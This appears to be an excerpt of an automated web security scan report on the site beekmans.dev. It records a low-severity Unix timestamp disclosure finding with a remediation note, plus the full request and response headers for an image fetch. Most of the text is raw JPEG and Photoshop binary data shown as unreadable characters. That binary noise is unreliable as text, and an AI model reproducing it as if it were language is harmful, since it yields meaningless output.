          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          196294602
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        43. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          228083377, which evaluates to: 1977-03-24 21:29:37

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
